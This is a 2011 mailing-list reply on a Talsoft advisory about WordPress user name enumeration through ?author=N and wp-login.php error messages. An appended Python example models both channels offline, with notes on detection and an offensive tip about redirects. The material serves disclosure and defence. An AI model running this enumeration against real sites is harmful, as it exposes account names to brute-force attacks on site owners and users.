Open Source and information security mailing list archives
Message-ID: <4DDE4F52.9010503@zerial.org>
Date: Thu, 26 May 2011 09:02:10 -0400
From: "Zerial." <fernando@...ial.org>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Talsoft S.R.L. Security Advisory - WordPress User IDs and User Names Disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Veronica,

You can also "enumerate" WordPress users using wp-login.php. When you enter a
non-existent user, WordPress returns "Invalid username", and when you enter a
valid user with any random/dummy password, WordPress returns "Invalid Password".
Now you can use brute force to enumerate all valid users using, for example, a
name/username dictionary.

Try using https://wordpress.com/wp-login.php

Is it a bug? Is it a vulnerability? Is it a feature?

Cheers,
Zerial
http://blog.zerial.org

On 05/26/11 00:46, Veronica wrote:
> -----------------------------------------------------------------------
> Talsoft S.R.L. Security Advisory
> WordPress User IDs and User Names Disclosure
> -----------------------------------------------------------------------
>
> I. Advisory information
> Title: WordPress User IDs and User Names Disclosure
> Advisory Id: TALSOFT-2011-0526
> Advisory URL:
> http://www.talsoft.com.ar/index.php/research/security-advisories/wordpress-user-id-and-user-name-disclosure
> Date published: 2011-05-26
> Vendors contacted: WordPress
> Author: Verónica Valeros
>
> II. Vulnerability information
> Class: Insecure Direct Object References (CWE-715)
> Impact: Low
> Remotely Exploitable: Yes
> Locally Exploitable: Yes
>
> III. Overview
> WordPress platforms use a parameter called ‘author’. This parameter
> accepts integer values and represents the ‘User ID’ of users in the
> web site. For example: http://www.example.com/?author=1
> The problems found are:
> 1. User ID values are generated consecutively.
> 2. When a valid User ID is found, WordPress redirects to a web page
> with the name of the author.
>
> These problems trigger the following attack vectors:
> 1. The query response discloses whether the User ID is enabled.
> 2. The query response leaks (by redirection) the User Name
> corresponding with that User ID. (See update for version 3.1.3)
>
> User IDs can be disabled, leaving holes within the consecutive
> numbers. Therefore, when an invalid User ID is sent, no redirection is
> done and no information is disclosed.
>
> Also, the attack can be automated, sending multiple queries to extract
> valid User Names and User IDs from the vulnerable web sites.
>
> Update:
> In version 3.1.3 the redirection explained in the second attack vector
> is not done, but it is still possible to find the User Name in the source
> code. Therefore, this version is still vulnerable.
>
> IV. Affected versions
> This issue was tested in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2.
> Other versions were not tested and may be vulnerable.
>
> V. Non affected versions
> Unknown.
>
> VI. Proof of concept
> A Proof of Concept (PoC) is available at:
> wp-userdata-disclosure-PoC.py.tar.gz
> <http://www.talsoft.com.ar/weblog/wp-content/uploads/2011/05/wp-userdata-disclosure-PoC.py_.tar.gz>
>
> VII. Solution
> WordPress version 3.1.3 fixes the redirection problem, but user names
> are still being disclosed in the HTML code. No solution was provided
> for this last problem.
>
> VIII. Disclosure timeline
> + 2011-03-14:
> - Vulnerability was identified.
> + 2011-05-11:
> - WordPress security team was contacted.
> + 2011-05-12:
> - WordPress confirmed the vulnerability.
> + 2011-05-25:
> - WordPress released version 3.1.3, which included a fix for the
> canonical redirection problem but did not include a fix for the
> source code problem.
> - WordPress security team was informed that after the release of
> version 3.1.3 the vulnerability was still exploitable.
> - WordPress team agreed to release the security advisory.
> + 2011-05-26:
> - The advisory was released.
>
> IX. Credits
> This vulnerability was discovered and reported by Verónica Valeros
> (veronicavaleros at talsoft.com.ar <http://talsoft.com.ar>)
>
> X. Disclaimer
> The information provided in this document is for information purposes
> only. Talsoft S.R.L. accepts no responsibility for any damage caused
> by the use or misuse of this information. The content of this advisory
> may be distributed freely, provided that no fee is charged for this
> distribution and proper credit is given.
>
> XI. About Talsoft S.R.L.
> Talsoft S.R.L. is a growing company with the mission to provide
> solutions in the following areas:
> + Information Security
> + Technology administration
> + Open source solutions
> + Trainings and courses
> Talsoft S.R.L. is also involved in many information security research
> projects.
>
> --
> Penetration Tester at TalSoft S.R.L.
> Email: veronicavaleros@...soft.com.ar
> <mailto:veronicavaleros@...soft.com.ar>
> www.talsoft.com.ar <http://www.talsoft.com.ar>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk3eT1IACgkQIP17Kywx9JSZ2ACfZlqLBPPG3C+feeSqe64n0ePw
6ecAn09kMCsQnJ4Vp5sMnamyeSOkyauD
=DCLD
-----END PGP SIGNATURE-----
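Editor's added example, covering both enumeration channels in the thread (the ?author=N probe from the Talsoft advisory and the wp-login.php error-text difference from Zerial's reply). It is not the Talsoft PoC and not code from WordPress; it runs offline against constructed responses. Two details are assumptions the page does not state: that the pre-3.1.3 redirect target has the /author/<nicename>/ permalink form, and that the non-redirecting 3.1.3-style archive page still names the author in the <body> class list as "author-<nicename>". The error strings are the ones quoted in the reply. Example code, not the project's own:

```python
# Added example (not from the advisory or from Zerial's post): offline model of
# the two enumeration channels the thread describes, ?author=N and the
# wp-login.php error text. Constructed responses stand in for a live site.
# Assumptions not stated on the page: the redirect target has the
# /author/<nicename>/ permalink form, and a non-redirecting 3.1.3-style page
# carries the nicename in the <body> class list as "author-<nicename>".
import re
from typing import Callable, Dict, Optional, Tuple

# (HTTP status, response headers, response body)
Response = Tuple[int, Dict[str, str], str]

_LOCATION_RE = re.compile(r"/author/([^/?#]+)/?")
_BODY_CLASS_RE = re.compile(r'<body[^>]*\bclass="([^"]*)"', re.IGNORECASE)
_AUTHOR_CLASS_RE = re.compile(r"\bauthor-([A-Za-z0-9_-]+)")


def username_from_author_response(resp: Response) -> Optional[str]:
    """Return the user name leaked by a ?author=N response, or None.

    Pre-3.1.3 installs leak it through the canonical redirect (attack
    vector 2 in the advisory); 3.1.3 drops the redirect but the archive
    page still names the author, modelled here via the body class
    (assumption, see above).
    """
    status, headers, body = resp
    if status in (301, 302):
        match = _LOCATION_RE.search(headers.get("Location", ""))
        if match:
            return match.group(1)
    if status == 200:
        match = _BODY_CLASS_RE.search(body)
        if match:
            for cls in _AUTHOR_CLASS_RE.findall(match.group(1)):
                if not cls.isdigit():  # skip the numeric "author-<id>" class
                    return cls
    return None  # 404 or no author marker: the ID is disabled or unused


def enumerate_authors(fetch: Callable[[int], Response], max_id: int) -> Dict[int, str]:
    """Walk consecutive IDs 1..max_id. A gap is a disabled ID, not the end
    of the list, so the walk never stops at the first miss."""
    found: Dict[int, str] = {}
    for uid in range(1, max_id + 1):
        name = username_from_author_response(fetch(uid))
        if name is not None:
            found[uid] = name
    return found


def classify_login_error(body: str) -> str:
    """Classify a wp-login.php failure page by the two strings quoted in the
    thread: 'Invalid username' means no such account, 'Invalid password'
    means the account exists and only the password was wrong."""
    lower = body.lower()
    if "invalid username" in lower:
        return "no such user"
    if "invalid password" in lower:
        return "user exists"
    return "unknown"


# Constructed stand-in for a site with admin (ID 1), editor (ID 2), a deleted
# ID 3, and ID 4 served by a 3.1.3-style install that no longer redirects.
_FAKE_SITE: Dict[int, Response] = {
    1: (301, {"Location": "http://www.example.com/author/admin/"}, ""),
    2: (301, {"Location": "http://www.example.com/author/editor/"}, ""),
    3: (404, {}, '<html><body class="error404">Not found</body></html>'),
    4: (200, {}, '<html><body class="archive author author-vero author-4">'
                 "<h1>Posts by vero</h1></body></html>"),
}

_FAKE_LOGIN_PAGES = {  # constructed wp-login.php failure bodies
    "nobody": "<div id='login_error'><strong>ERROR</strong>: Invalid username.</div>",
    "admin": "<div id='login_error'><strong>ERROR</strong>: Invalid password.</div>",
}


def fake_fetch(uid: int) -> Response:
    """Offline replacement for GET http://www.example.com/?author=<uid>."""
    return _FAKE_SITE.get(uid, (404, {}, ""))


if __name__ == "__main__":
    print(enumerate_authors(fake_fetch, 6))  # {1: 'admin', 2: 'editor', 4: 'vero'}
    for user, page in _FAKE_LOGIN_PAGES.items():
        print(user, "->", classify_login_error(page))
```

Two practitioner notes follow from the model. On the defensive side, both channels are detectable from access logs: a run of consecutive ?author=N requests from one source, or a burst of POSTs to wp-login.php with distinct usernames, and the fix for the login channel is to return one neutral error for both cases rather than distinguishing "username" from "password". On the offensive side, a real fetch function should follow neither redirects nor cookies automatically, because the Location header is the signal and following it would hide the 301 that username_from_author_response keys on.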